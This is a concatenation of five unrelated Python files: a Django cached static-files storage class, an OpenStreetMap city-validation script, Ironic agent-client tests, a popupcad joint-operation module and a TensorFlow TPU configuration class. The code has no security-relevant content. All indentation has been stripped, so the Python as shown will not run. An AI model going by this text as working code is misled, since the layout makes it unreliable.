except InvalidCacheBackendError:
# Use the default backend
self.cache = default_cache
self._patterns = SortedDict()
for extension, patterns in self.patterns:
for pattern in patterns:
compiled = re.compile(pattern)
self._patterns.setdefault(extension, []).append(compiled)
def hashed_name(self, name, content=None):
parsed_name = urlsplit(unquote(name))
clean_name = parsed_name.path
if content is None:
if not self.exists(clean_name):
raise ValueError("The file '%s' could not be found with %r." %
(clean_name, self))
try:
content = self.open(clean_name)
except IOError:
# Handle directory paths
return name
path, filename = os.path.split(clean_name)
root, ext = os.path.splitext(filename)
# Get the MD5 hash of the file
md5 = hashlib.md5()
for chunk in content.chunks():
md5.update(chunk)
md5sum = md5.hexdigest()[:12]
hashed_name = os.path.join(path, u"%s.%s%s" % (root, md5sum, ext))
unparsed_name = list(parsed_name)
unparsed_name[2] = hashed_name
return urlunsplit(unparsed_name)
def cache_key(self, name):
return u'staticfiles:cache:%s' % name
def url(self, name, force=False):
"""
Returns the real URL in DEBUG mode.
"""
if settings.DEBUG and not force:
hashed_name = name
else:
cache_key = self.cache_key(name)
hashed_name = self.cache.get(cache_key)
if hashed_name is None:
hashed_name = self.hashed_name(name)
# set the cache if there was a miss (e.g. if cache server goes down)
self.cache.set(cache_key, hashed_name)
return unquote(super(CachedFilesMixin, self).url(hashed_name))
def url_converter(self, name):
"""
Returns the custom URL converter for the given file name.
"""
def converter(matchobj):
"""
Converts the matched URL depending on the parent level (`..`)
and returns the normalized and hashed URL using the url method
of the storage.
"""
matched, url = matchobj.groups()
# Completely ignore http(s) prefixed URLs
if url.startswith(('http', 'https')):
return matched
name_parts = name.split('/')
# Using posix normpath here to remove duplicates
url = posixpath.normpath(url)
url_parts = url.split('/')
parent_level, sub_level = url.count('..'), url.count('/')
if url.startswith('/'):
sub_level -= 1
url_parts = url_parts[1:]
if parent_level or not url.startswith('/'):
start, end = parent_level + 1, parent_level
else:
if sub_level:
if sub_level == 1:
parent_level -= 1
start, end = parent_level, sub_level - 1
else:
start, end = 1, sub_level - 1
joined_result = '/'.join(name_parts[:-start] + url_parts[end:])
hashed_url = self.url(unquote(joined_result), force=True)
# Return the hashed and normalized version to the file
return 'url("%s")' % unquote(hashed_url)
return converter
def post_process(self, paths, dry_run=False, **options):
"""
Post process the given list of files (called from collectstatic).
"""
processed_files = []
# don't even dare to process the files if we're in dry run mode
if dry_run:
return processed_files
# delete cache of all handled paths
self.cache.delete_many([self.cache_key(path) for path in paths])
# only try processing the files we have patterns for
matches = lambda path: matches_patterns(path, self._patterns.keys())
processing_paths = [path for path in paths if matches(path)]
# then sort the files by the directory level
path_level = lambda name: len(name.split(os.sep))
for name in sorted(paths, key=path_level, reverse=True):
# first get a hashed name for the given file
hashed_name = self.hashed_name(name)
with self.open(name) as original_file:
# then get the original's file content
content = original_file.read()
# to apply each replacement pattern on the content
if name in processing_paths:
converter = self.url_converter(name)
for patterns in self._patterns.values():
for pattern in patterns:
content = pattern.sub(converter, content)
# then save the processed result
if self.exists(hashed_name):
self.delete(hashed_name)
saved_name = self._save(hashed_name, ContentFile(content))
hashed_name = force_unicode(saved_name.replace('\\', '/'))
processed_files.append(hashed_name)
# and then set the cache accordingly
self.cache.set(self.cache_key(name), hashed_name)
return processed_files
class CachedStaticFilesStorage(CachedFilesMixin, StaticFilesStorage):
"""
A static file system storage backend which also saves
hashed copies of the files it saves.
"""
pass
class AppStaticStorage(FileSystemStorage):
"""
A file system storage backend that takes an app module and works
for the ``static`` directory of it.
"""
prefix = None
source_dir = 'static'
def __init__(self, app, *args, **kwargs):
"""
Returns a static file storage if available in the given app.
"""
# app is the actual app module
mod = import_module(app)
mod_path = os.path.dirname(mod.__file__)
location = os.path.join(mod_path, self.source_dir)
super(AppStaticStorage, self).__init__(location, *args, **kwargs)
class ConfiguredStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class(settings.STATICFILES_STORAGE)()
staticfiles_storage = ConfiguredStorage()
| |
"""
Current version of reference city list can be found at
http://testdata.mapsme.cloud.devmail.ru/planet_checks/osm_big_cities_full_data.geojson
The script verifies that OSM dump contains all cities from a geojson-formatted
reference list. This file is usually obtained with the overpass-query:
node[place=city](if:t["population"] >= 200000 || t["capital"]=='yes');
Thus, the result doesn't contain some cities which, during extraction:
1) have had 'town' status;
2) have been [temporarily] lacking the "place=*" tag at all.
On the other hand, the generated reference list contains even small cities
with poorly formatted population like "3,565" or "3 565". However this
reference list helps not to lose already revealed cities.
The reference list is compared with cities from the filtered planet dump:
/path/to/osmctools/osmfilter "${PLANET}" \
--keep="( place=city OR place=town ) AND ( capital=yes OR capital=2 OR \
population>=200000 )" \
--keep-tags="all place= capital= name= name:en= population=" \
--ignore-dependencies \
--drop-version \
--out-osm \
-o="big_cities-filtered.osm"
Note that in the result there would not be cities with non-integer population
tag, but we would be able to fix this tag in OSM when detect such cities
with the help of the script.
TODO:
*) inform about big cities found in OSM but not in reference list, to
augment reference list with cities that were broken or have had no population.
"""
import argparse
import functools
import itertools
import json
import logging
import math
import sys
from collections import defaultdict
try:
from lxml import etree
except ImportError:
import xml.etree.ElementTree as etree
PLACE_TAGS = ('place', 'name', 'name:en')
class ValidationError(Exception):
"""The exception is thrown if cities validation failed."""
def big_cities_generator(filename):
for event, element in etree.iterparse(filename):
feature_type = element.tag
# TODO: include also ways/relations. Being got with osmfilter they don't
## contain coordinates. Try osmconvert --all-to-nodes.
if feature_type != 'node':
continue
tags = dict.fromkeys(PLACE_TAGS)
for child in element:
if child.tag == 'tag':
tag_name = child.get('k')
if tag_name in tags:
tag_value = child.get('v')
tags[tag_name] = tag_value
if tags['place'] is None:
continue
feature = {
'id': f"{feature_type[0]}{element.get('id')}",
'tags': tags,
'position': [float(element.get(c)) for c in ('lon', 'lat')]
}
yield feature
# If we don't need xml document tree it makes sense to clear
# elements to save memory.
element.clear()
def read_reference_cities(reference_geojson_filename):
"""Returns list of cities as objects with fields 'id',
'properties', 'geometry' (as geojson features generated by overpass-api).
"""
with open(reference_geojson_filename) as f:
geojson = json.load(f)
return geojson['features']
def extract_osm_cities(big_cities_osm_filename):
cities_by_name = defaultdict(list)
for city in big_cities_generator(big_cities_osm_filename):
name, name_en = (city['tags'].get(tag) for tag in ('name', 'name:en'))
if not name and not name_en:
logging.warning(f"City without name and name:en {city['id']}")
continue
if name:
cities_by_name[name].append(city)
if name_en and name_en != name:
cities_by_name[name_en].append(city)
return cities_by_name
coord_isclose = functools.partial(math.isclose, abs_tol=0.25) # 1deg~100 km
def are_locations_close(position1, position2):
return (
coord_isclose(position1[0], position2[0]) and
coord_isclose(position1[1], position2[1])
)
def get_city_names(city):
return list(
filter(
None, # Filters only "True" (not False/None/0/'') values
(city['properties'].get(tag) for tag in ('name:en', 'name'))
)
)
def find_matching_cities_for_reference(reference_city, osm_cities_by_name):
names = get_city_names(reference_city)
candidate_cities = itertools.chain.from_iterable(
osm_cities_by_name[name] for name in names
)
matching_cities = []
seen_ids = set()
for city in candidate_cities:
if city['id'] in seen_ids:
continue
if are_locations_close(
reference_city['geometry']['coordinates'],
city['position']
):
matching_cities.append(city)
seen_ids.add(city['id'])
return matching_cities
def validate_big_cities(big_cities_osm_filename, reference_geojson_filename):
"""This function compares reference city file with OSM data, generates
logging messages of different level on data errors, and raises an exception
if critical errors encounter.
"""
reference_cities = read_reference_cities(reference_geojson_filename)
osm_cities_by_name = extract_osm_cities(big_cities_osm_filename)
all_cities_found = True
for ref_city in reference_cities:
city_names = get_city_names(ref_city)
if not city_names:
raise ValidationError(f"Reference city {ref_city['id']} "
f"without name tags")
display_name = city_names[0]
matching_cities = find_matching_cities_for_reference(
ref_city,
osm_cities_by_name
)
num_matched_cities = len(matching_cities)
if num_matched_cities != 1:
if num_matched_cities > 1:
logging.warning(f"More than one city {display_name} at one "
f"place: {[x['id'] for x in matching_cities]}")
else:
all_cities_found = False
logging.critical(f"Not found city {display_name} ({ref_city['id']})"
f" {ref_city['geometry']['coordinates']}")
if not all_cities_found:
raise ValidationError("Not all cities found in OSM")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
log_levels = [
name.lower()
for number, name in logging._levelToName.items()
if number > 0
]
parser.add_argument('-L', '--log-level', choices=log_levels,
default='critical', help='log level')
parser.add_argument('-c', '--big-cities-current', required=True,
help='Path to *.osm with big cities')
parser.add_argument('-r', '--big-cities-reference', required=True,
help='Path to geojson with required cities')
options = parser.parse_args()
log_level_name = options.log_level.upper()
logging.basicConfig(level=getattr(logging, log_level_name),
format='%(levelname)-8s %(message)s')
try:
validate_big_cities(
options.big_cities_current,
options.big_cities_reference
)
except ValidationError as e:
logging.critical(e)
sys.exit(1)
except Exception as e:
logging.critical("", exc_info=1)
sys.exit(1)
| |
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
import requests
import six
from ironic.common import exception
from ironic.drivers.modules import agent_client
from ironic.tests import base
class MockResponse(object):
def __init__(self, text):
assert isinstance(text, six.string_types)
self.text = text
def json(self):
return json.loads(self.text)
class MockNode(object):
def __init__(self):
self.uuid = 'uuid'
self.driver_info = {}
self.driver_internal_info = {
'agent_url': "http://127.0.0.1:9999",
'clean_version': {'generic': '1'}
}
self.instance_info = {}
def as_dict(self):
return {
'uuid': self.uuid,
'driver_info': self.driver_info,
'driver_internal_info': self.driver_internal_info,
'instance_info': self.instance_info
}
class TestAgentClient(base.TestCase):
def setUp(self):
super(TestAgentClient, self).setUp()
self.client = agent_client.AgentClient()
self.client.session = mock.Mock(autospec=requests.Session)
self.node = MockNode()
def test_content_type_header(self):
client = agent_client.AgentClient()
self.assertEqual('application/json',
client.session.headers['Content-Type'])
def test__get_command_url(self):
command_url = self.client._get_command_url(self.node)
expected = self.node.driver_internal_info['agent_url'] + '/v1/commands'
self.assertEqual(expected, command_url)
def test__get_command_url_fail(self):
del self.node.driver_internal_info['agent_url']
self.assertRaises(exception.IronicException,
self.client._get_command_url,
self.node)
def test__get_command_body(self):
expected = json.dumps({'name': 'prepare_image', 'params': {}})
self.assertEqual(expected,
self.client._get_command_body('prepare_image', {}))
def test__command(self):
response_data = {'status': 'ok'}
response_text = json.dumps(response_data)
self.client.session.post.return_value = MockResponse(response_text)
method = 'standby.run_image'
image_info = {'image_id': 'test_image'}
params = {'image_info': image_info}
url = self.client._get_command_url(self.node)
body = self.client._get_command_body(method, params)
response = self.client._command(self.node, method, params)
self.assertEqual(response, response_data)
self.client.session.post.assert_called_once_with(
url,
data=body,
params={'wait': 'false'})
def test__command_fail_json(self):
response_text = 'this be not json matey!'
self.client.session.post.return_value = MockResponse(response_text)
method = 'standby.run_image'
image_info = {'image_id': 'test_image'}
params = {'image_info': image_info}
url = self.client._get_command_url(self.node)
body = self.client._get_command_body(method, params)
self.assertRaises(exception.IronicException,
self.client._command,
self.node, method, params)
self.client.session.post.assert_called_once_with(
url,
data=body,
params={'wait': 'false'})
def test_get_commands_status(self):
with mock.patch.object(self.client.session, 'get') as mock_get:
res = mock.Mock()
res.json.return_value = {'commands': []}
mock_get.return_value = res
self.assertEqual([], self.client.get_commands_status(self.node))
@mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
def test_prepare_image(self):
self.client._command = mock.Mock()
image_info = {'image_id': 'image'}
params = {'image_info': image_info}
self.client.prepare_image(self.node,
image_info,
wait=False)
self.client._command.assert_called_once_with(node=self.node,
method='standby.prepare_image',
params=params,
wait=False)
@mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
def test_prepare_image_with_configdrive(self):
self.client._command = mock.Mock()
configdrive_url = 'http://swift/configdrive'
self.node.instance_info['configdrive'] = configdrive_url
image_info = {'image_id': 'image'}
params = {
'image_info': image_info,
'configdrive': configdrive_url,
}
self.client.prepare_image(self.node,
image_info,
wait=False)
self.client._command.assert_called_once_with(node=self.node,
method='standby.prepare_image',
params=params,
wait=False)
@mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
def test_start_iscsi_target(self):
self.client._command = mock.Mock()
iqn = 'fake-iqn'
params = {'iqn': iqn}
self.client.start_iscsi_target(self.node, iqn)
self.client._command.assert_called_once_with(node=self.node,
method='iscsi.start_iscsi_target',
params=params,
wait=True)
@mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
def test_install_bootloader(self):
self.client._command = mock.Mock()
root_uuid = 'fake-root-uuid'
efi_system_part_uuid = 'fake-efi-system-part-uuid'
params = {'root_uuid': root_uuid,
'efi_system_part_uuid': efi_system_part_uuid}
self.client.install_bootloader(
self.node, root_uuid, efi_system_part_uuid=efi_system_part_uuid)
self.client._command.assert_called_once_with(
node=self.node, method='image.install_bootloader', params=params,
wait=True)
def test_get_clean_steps(self):
self.client._command = mock.Mock()
ports = []
expected_params = {
'node': self.node.as_dict(),
'ports': []
}
self.client.get_clean_steps(self.node,
ports)
self.client._command.assert_called_once_with(node=self.node,
method='clean.get_clean_steps',
params=expected_params,
wait=True)
def test_execute_clean_step(self):
self.client._command = mock.Mock()
ports = []
step = {'priority': 10, 'step': 'erase_devices', 'interface': 'deploy'}
expected_params = {
'step': step,
'node': self.node.as_dict(),
'ports': [],
'clean_version': self.node.driver_internal_info.get(
'hardware_manager_version')
}
self.client.execute_clean_step(step,
self.node,
ports)
self.client._command.assert_called_once_with(node=self.node,
method='clean.execute_clean_step',
params=expected_params,
wait=False)
| |
from __future__ import print_function, division #Fixes crossplatform print issues
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
from popupcad.widgets.dragndroptree import DraggableTreeWidget
import PySide.QtGui as qg
import PySide.QtCore as qc
import popupcad
from popupcad.filetypes.operationoutput import OperationOutput
from popupcad.filetypes.operation2 import Operation2, LayerBasedOperation
from popupcad.filetypes.laminate import Laminate
from popupcad.widgets.table_editor_popup import Table,SingleItemListElement_old, MultiItemListElement, FloatElement, Row,Delegate,TableControl
from popupcad.widgets.listmanager import SketchListManager
try:
import itertools.izip as zip
except ImportError:
pass
class JointRow(Row):
def __init__(self, get_sketches, get_layers):
elements = []
elements.append(SingleItemListElement_old('joint sketch', get_sketches))
elements.append(SingleItemListElement_old('joint layer', get_layers))
elements.append(MultiItemListElement('sublaminate layers', get_layers))
elements.append(FloatElement('hinge width'))
elements.append(FloatElement('stiffness'))
elements.append(FloatElement('damping'))
elements.append(FloatElement('preload'))
elements.append(FloatElement('limit negative',ini=-180))
elements.append(FloatElement('limit positive',ini=180))
self.elements = elements
class JointDef(object):
def __init__(self,sketch,joint_layer,sublaminate_layers,width,stiffness,damping,preload_angle,limit_negative,limit_positive):
self.sketch = sketch
self.joint_layer = joint_layer
self.sublaminate_layers = sublaminate_layers
self.width = width
self.stiffness = stiffness
self.damping = damping
self.preload_angle = preload_angle
self.limit_negative = limit_negative
self.limit_positive = limit_positive
def copy(self):
new = type(self)(
self.sketch,
self.joint_layer,
self.sublaminate_layers,
self.width,
self.stiffness,
self.damping,
self.preload_angle,
self.limit_negative,
self.limit_positive)
return new
class MainWidget(qg.QDialog):
def __init__(self, design, sketches, layers, operations, jointop=None,sketch = None):
super(MainWidget, self).__init__()
self.design = design
self.sketches = sketches
self.layers = layers
self.operations = operations
self.operation_list = DraggableTreeWidget()
self.operation_list.linklist(self.operations)
self.fixed = DraggableTreeWidget()
self.fixed.linklist(self.operations)
self.table = Table(JointRow(self.get_sketches, self.get_layers),Delegate)
table_control= TableControl(self.table, self)
self.sketchwidget = SketchListManager(self.design,name='Contact Points Sketch')
for ii in range(self.sketchwidget.itemlist.count()):
item = self.sketchwidget.itemlist.item(ii)
if item.value == sketch:
item.setSelected(True)
button_ok = qg.QPushButton('Ok')
button_cancel = qg.QPushButton('Cancel')
button_ok.clicked.connect(self.accept)
button_cancel.clicked.connect(self.reject)
sublayout1 = qg.QHBoxLayout()
sublayout1_1 = qg.QVBoxLayout()
sublayout1_2 = qg.QVBoxLayout()
sublayout1_3 = qg.QVBoxLayout()
sublayout1_1.addWidget(qg.QLabel('Device'))
sublayout1_1.addWidget(self.operation_list)
sublayout1_2.addWidget(qg.QLabel('Fixed Region'))
sublayout1_2.addWidget(self.fixed)
sublayout1_3.addWidget(self.sketchwidget)
sublayout1.addLayout(sublayout1_1)
sublayout1.addLayout(sublayout1_2)
sublayout1.addLayout(sublayout1_3)
sublayout2 = qg.QHBoxLayout()
sublayout2.addStretch()
sublayout2.addWidget(button_ok)
sublayout2.addWidget(button_cancel)
sublayout2.addStretch()
layout = qg.QVBoxLayout()
layout.addLayout(sublayout1)
layout.addWidget(table_control)
layout.addLayout(sublayout2)
self.setLayout(layout)
if jointop is not None:
try:
op_ref, output_ii = jointop.operation_links['parent'][0]
op_ii = design.operation_index(op_ref)
self.operation_list.selectIndeces([(op_ii, output_ii)])
except(IndexError, KeyError):
pass
try:
fixed_ref, fixed_output_ii = jointop.operation_links[
'fixed'][0]
fixed_ii = design.operation_index(fixed_ref)
self.fixed.selectIndeces([(fixed_ii, fixed_output_ii)])
except(IndexError, KeyError):
pass
for item in jointop.joint_defs:
sketch = self.design.sketches[item.sketch]
joint_layer = self.design.return_layer_definition().getlayer(
item.joint_layer)
sublaminate_layers = [self.design.return_layer_definition().getlayer(
item2) for item2 in item.sublaminate_layers]
self.table.row_add(
sketch,
joint_layer,
sublaminate_layers,
item.width,
item.stiffness,
item.damping,
item.preload_angle,
item.limit_negative,
item.limit_positive)
else:
self.table.row_add_empty()
self.table.resizeColumnsToContents()
self.table.reset_min_width()
self.table.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarPolicy.ScrollBarAlwaysOff)
def contact_sketch(self):
try:
return self.sketchwidget.itemlist.selectedItems()[0].value
except IndexError:
return None
def get_sketches(self):
return self.sketches
def get_layers(self):
return self.layers
def acceptdata(self):
jointdefs = []
for ii in range(self.table.rowCount()):
sketch = self.table.item(ii, 0).data(qc.Qt.ItemDataRole.UserRole)
joint_layer = self.table.item(
ii, 1).data(
qc.Qt.ItemDataRole.UserRole)
sublaminate_layers = self.table.item(
ii, 2).data(
qc.Qt.ItemDataRole.UserRole)
width = (self.table.item(ii, 3).data(qc.Qt.ItemDataRole.UserRole))
stiffness = (
self.table.item(
ii, 4).data(
qc.Qt.ItemDataRole.UserRole))
damping = (
self.table.item(
ii,
5).data(
qc.Qt.ItemDataRole.UserRole))
preload_angle = (self.table.item(ii, 6).data(qc.Qt.ItemDataRole.UserRole))
limit_negative = (self.table.item(ii, 7).data(qc.Qt.ItemDataRole.UserRole))
limit_positive = (self.table.item(ii, 8).data(qc.Qt.ItemDataRole.UserRole))
jointdefs.append(JointDef(sketch.id,
joint_layer.id,
[item.id for item in sublaminate_layers],
width,
stiffness,
damping,
preload_angle,limit_negative,limit_positive))
operation_links = {}
operation_links['parent'] = self.operation_list.currentRefs()
operation_links['fixed'] = self.fixed.currentRefs()
sketch_links = {}
sketch_links['contact_points'] = [self.contact_sketch().id]
return operation_links,sketch_links,jointdefs
class JointOperation3(Operation2, LayerBasedOperation):
name = 'JointOp'
resolution = 2
def copy(self):
new = type(self)(
self.operation_links, self.sketch_links,[item.copy() for item in self.joint_defs])
new.id = self.id
new.customname = self.customname
return new
def __init__(self, *args):
super(JointOperation3, self).__init__()
self.editdata(*args)
self.id = id(self)
def editdata(self, operation_links,sketch_links,joint_defs):
super(JointOperation3,self).editdata(operation_links,sketch_links,{})
self.joint_defs = joint_defs
@classmethod
def buildnewdialog(cls, design, currentop):
dialog = MainWidget(
design,
design.sketches.values(),
design.return_layer_definition().layers,
design.operations)
return dialog
def buildeditdialog(self, design):
sketch = design.sketches[self.sketch_links['contact_points'][0]]
dialog = MainWidget(
design,
design.sketches.values(),
design.return_layer_definition().layers,
design.prioroperations(self),
self,sketch)
return dialog
def sketchrefs(self):
items = super(JointOperation3,self).sketchrefs()
items.extend([item.sketch for item in self.joint_defs])
return items
def gen_geoms(self, joint_def, layerdef, design):
print('Generating geometry')
hinge_gap = joint_def.width *popupcad.csg_processing_scaling
split_buffer = .1 * hinge_gap
stiffness = joint_def.stiffness
damping = joint_def.damping
preload_angle = joint_def.preload_angle
limit_negative = joint_def.limit_negative
limit_positive = joint_def.limit_positive
sublaminate_layers = [
layerdef.getlayer(item) for item in joint_def.sublaminate_layers]
hingelayer = layerdef.getlayer(joint_def.joint_layer)
operationgeom = design.sketches[joint_def.sketch].output_csg()
sketch_result = Laminate(design.return_layer_definition())
sketch_result.replacelayergeoms(hingelayer, operationgeom)
hingelines = sketch_result.to_generic_laminate().geoms[hingelayer]
hingelines = [item for item in hingelines if item.is_valid_bool()]
buffered_split = sketch_result.buffer(
split_buffer,
resolution=self.resolution)
allgeoms4 = []
for geom in hingelines:
geom = geom.to_shapely()
laminate = Laminate(layerdef)
for layer in sublaminate_layers:
laminate.replacelayergeoms(layer, [geom])
allgeoms4.append(
laminate.buffer(
hinge_gap,
resolution=self.resolution))
joint_props = [(stiffness, damping, preload_angle, limit_negative, limit_positive)
for item in hingelines]
return allgeoms4, buffered_split, hingelines, joint_props
def generate(self, design):
safe_buffer1 = .5 *popupcad.csg_processing_scaling
safe_buffer2 = .5 *popupcad.csg_processing_scaling
safe_buffer3 = .5 *popupcad.csg_processing_scaling
parent_id, parent_output_index = self.operation_links['parent'][0]
parent_index = design.operation_index(parent_id)
parent = design.operations[parent_index].output[
parent_output_index].csg
fixed_id, fixed_output_index = self.operation_links['fixed'][0]
fixed_index = design.operation_index(fixed_id)
fixed = design.operations[fixed_index].output[fixed_output_index].csg
layerdef = design.return_layer_definition()
allgeoms = []
allhingelines = []
buffered_splits = []
all_joint_props = {}
for joint_def in self.joint_defs:
allgeoms4, buffered_split, hingelines, joint_props = self.gen_geoms(
joint_def, layerdef, design)
allgeoms.extend(allgeoms4)
allhingelines.extend(hingelines)
buffered_splits.append(buffered_split)
for jointline,jointprop in zip(hingelines,joint_props):
all_joint_props[jointline]=jointprop
#allhingelines, buffered_splits = zip(*sorted(zip(allhingelines, allgeoms, buffered_splits)))
#allhingelines = list(allhingelines)
#allgeoms = list(allgeoms)
#buffered_splits = list(buffered_splits)
safe_sections = []
for ii in range(len(allgeoms)):
unsafe = Laminate.unaryoperation(
allgeoms[
:ii] +
allgeoms[
ii +
1:],
'union')
unsafe_buffer = unsafe.buffer(
safe_buffer1,
resolution=self.resolution)
safe_sections.append(allgeoms[ii].difference(unsafe_buffer))
safe = Laminate.unaryoperation(safe_sections, 'union')
buffered_splits2 = Laminate.unaryoperation(buffered_splits, 'union')
safe_buffer = safe.buffer(safe_buffer2, resolution=self.resolution)
unsafe = Laminate.unaryoperation(
allgeoms,
'union').difference(safe_buffer)
unsafe2 = unsafe.buffer(safe_buffer3, resolution=self.resolution)
split1 = parent.difference(unsafe2)
split2 = split1.difference(buffered_splits2)
bodies = popupcad.algorithms.body_detection.find(
split2.to_generic_laminate())
bodies_generic = [item.to_generic_laminate() for item in bodies]
connections = {}
connections2 = {}
for line, geom in zip(allhingelines, safe_sections):
connections[line] = []
connections2[line] = []
for body, body_generic in zip(bodies, bodies_generic):
if not geom.intersection(body).isEmpty():
connections[line].append(body_generic)
connections2[line].append(body)
for line, geoms in connections2.items():
connections2[line] = Laminate.unaryoperation(geoms, 'union')
self.fixed_bodies = []
fixed_csg = []
for body, body_generic in zip(bodies, bodies_generic):
if not fixed.intersection(body).isEmpty():
self.fixed_bodies.append(body_generic)
fixed_csg.append(body)
self.bodies_generic = bodies_generic
allhingelines.sort() #Sort here to prevent interfering with geometry. We only care about order of the joint props
self.connections = sorted([(key, connections[key]) for key in allhingelines if len(connections[key]) == 2])
self.all_joint_props = [all_joint_props[key] for key in allhingelines if len(connections[key]) == 2]
self.output = []
self.output.append(OperationOutput(safe,'Safe',self))
self.output.append(OperationOutput(unsafe,'Unsafe',self))
self.output.append(OperationOutput(split1,'Split1',self))
self.output.append(OperationOutput(split2,'Split2',self))
#TODO Change output to match the names that get exported to Gazebo
self.output.extend([OperationOutput(item,'Fixed {0:d}'.format(ii),self) for ii,item in enumerate(fixed_csg)])
self.output.extend([OperationOutput(item,'Body {0:d}'.format(ii),self) for ii,item in enumerate(bodies)])
self.output.extend([OperationOutput(item,'Connection {0:d}'.format(ii),self) for ii,item in enumerate(connections2.values())])
self.output.insert(0, self.output[3])
def switch_layer_defs(self, layerdef_old, layerdef_new):
new = self.copy()
for joint_def in new.joint_defs:
joint_def.joint_layer = new.convert_layer_links(
[joint_def.joint_layer], layerdef_old, layerdef_new)[0]
joint_def.sublaminate_layers = new.convert_layer_links(
[joint_def.sublaminate_layers], layerdef_old, layerdef_new)[0]
return new
#Returns a key of laminates to generations and assigns the value
#The original fixed body is generation 0 and all others are children to it.
def get_laminate_generations(self):
current_node = self.fixed_bodies[0] #The root of the tree
joint_pairs = [my_tuple[1] for my_tuple in self.connections]
hierarchy_map = {}
generation = 0 #The geneation of the current node
hierarchy_map[current_node] = generation
generation += 1
child_queue = [current_node]
visited_set = []
while len(child_queue) > 0:
current_node = child_queue.pop(0)
visited_set.append(current_node)
children_tuples = [joint_pair for joint_pair in joint_pairs if current_node in joint_pair]
children = [[joint for joint in joint_pair if joint != current_node][0] for joint_pair in children_tuples]
children = [child for child in children if child not in visited_set]
for child in children:
hierarchy_map[child] = generation
generation += 1
#Queues up the next batch of children
child_queue.extend([child for child in children if child not in visited_set])
return hierarchy_map
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""A RunConfig subclass with TPU support."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import os
import numpy as np
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.platform import tf_logging as logging
# pylint: disable=protected-access
_TF_CONFIG_ENV = run_config_lib._TF_CONFIG_ENV
_SERVICE_KEY = run_config_lib._SERVICE_KEY
_TPU_WORKER_JOB_NAME = 'tpu_worker_job_name'
_NUM_CORES_PER_HOST = 8
# pylint: enable=protected-access
# TODO(b/72511246) Provide a simplified api to configure model parallelism.
class TPUConfig(
collections.namedtuple('TPUConfig', [
'iterations_per_loop',
'num_shards',
'computation_shape',
'per_host_input_for_training',
'tpu_job_name',
'initial_infeed_sleep_secs',
])):
r"""TPU related configuration required by `TPUEstimator`.
Args:
iterations_per_loop: This is the number of train steps running in TPU
system before returning to CPU host for each `Session.run`. This means
global step is increased `iterations_per_loop` times in one `Session.run`.
It is recommended to be set as number of global steps for next checkpoint.
num_shards: (Deprecated, ignored by TPUEstimator).
The number of model replicas in the system. For non-model-parallelism
case, this number equals the total number of TPU cores. For
model-parallelism, the total number of TPU cores equals
product(computation_shape) * num_shards.
computation_shape: Defaults to `None`, which disables model parallelism. A
list of size 3 which describes the shape of a model replica's block of
cores. This is required by model-parallelism which enables partitioning
the model to multiple cores. For example, [2, 2, 1] means the model is
partitioned across 4 cores which span two cores in both x and y
coordinates. Please refer to ${tf.contrib.tpu.TopologyProto} for the
geometry of a TPU mesh.
per_host_input_for_training: If `True`, `input_fn` is invoked Per-Host
rather than Per-Core. With Per-Host input pipeline deployment, `input_fn`
is invoked once on each host. With Per-Core input pipeline deployment, it
is invoked once for each core. To be precise, with a global batch size
`train_batch_size` in `TPUEstimator` constructor, the batch size for each
shard is `train_batch_size` // #hosts. With Per-Core input pipeline
deployment, the shard batch size is `train_batch_size` // #cores.
tpu_job_name: The name of the TPU job. Typically, this name is auto-inferred
within TPUEstimator, however when using ClusterSpec propagation in more
esoteric cluster configurations, you may need to specify the job name as a
string.
initial_infeed_sleep_secs: The number of seconds the infeed thread should
wait before enqueueing the first batch. This helps avoid timeouts for
models that require a long compilation time.
Raises:
ValueError: If `computation_shape` or `computation_shape` are invalid.
"""
def __new__(cls,
iterations_per_loop=2,
num_shards=None,
computation_shape=None,
per_host_input_for_training=True,
tpu_job_name=None,
initial_infeed_sleep_secs=None):
# Check iterations_per_loop.
util_lib.check_positive_integer(iterations_per_loop,
'TPUConfig iterations_per_loop')
# Check num_shards.
if num_shards is not None:
util_lib.check_positive_integer(num_shards, 'TPUConfig num_shards')
# Check computation_shape
if computation_shape is not None and len(computation_shape) != 3:
raise ValueError(
'computation_shape must be a list with length 3 or None; got {}'.
format(str(computation_shape)))
if computation_shape is not None:
computation_shape_array = np.asarray(computation_shape, dtype=np.int32)
# This prevents any computation being replicated across multiple hosts, so
# that each host feeds the same number of computations.
if any(computation_shape_array < 1) or any(computation_shape_array > 2):
raise ValueError('computation_shape elements can only be 1 or 2; got '
'computation_shape={}'.format(computation_shape))
# Check initial_infeed_sleep_secs.
if initial_infeed_sleep_secs:
util_lib.check_positive_integer(initial_infeed_sleep_secs,
'TPUConfig initial_infeed_sleep_secs')
tpu_job_name = tpu_job_name or _get_tpu_job_name_from_tf_config()
return super(TPUConfig, cls).__new__(
cls,
iterations_per_loop=iterations_per_loop,
num_shards=num_shards,
computation_shape=computation_shape,
per_host_input_for_training=per_host_input_for_training,
tpu_job_name=tpu_job_name,
initial_infeed_sleep_secs=initial_infeed_sleep_secs)
